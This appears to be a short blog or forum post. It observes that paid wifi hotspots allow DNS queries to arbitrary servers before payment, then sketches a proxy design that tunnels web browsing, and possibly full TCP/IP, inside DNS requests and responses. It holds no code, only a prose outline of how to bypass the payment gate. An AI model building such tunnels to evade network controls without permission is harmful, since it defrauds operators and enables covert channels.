So, lets take this idea of tunneling over ICMP and think about the current hotspot configuration. One thing hotspots haven't considered is IP over DNS. I've confirmed at several hotspots that the prior to paying for service a user can performing the following:
- You can perform DNS resolutions to the default DNS server
- You can perform DNS resolutions to an arbitrary DNS server.
The main problem is item #2. By allowing DNS lookups to arbitrary DNS servers you are creating an opportunity for an alternate channel over DNS requests.
Consider the following:
-The mobile laptop is configured with a proxy of localhost:<some port>
-A proxy application is running on the laptop which accepts web requests, inserts them into the data of a dns request and forwards them over port 53 to a remote DNS server
-A remote server is configured with a proxy application which accepts dns requests and pulls the web request from the data portion of the dns packet
-The server application makes the web request, receives the response
-The server wraps the response into a dns response message and sends it back to the laptop
-The proxy application receives the response and sends it to the browser.
The end results would be full web browsing that is tunneled over dns request/response. There really is no reason why you couldn't expand this idea to a full TCP/IP connection tunneled over DNS. That would just take a little bit more work.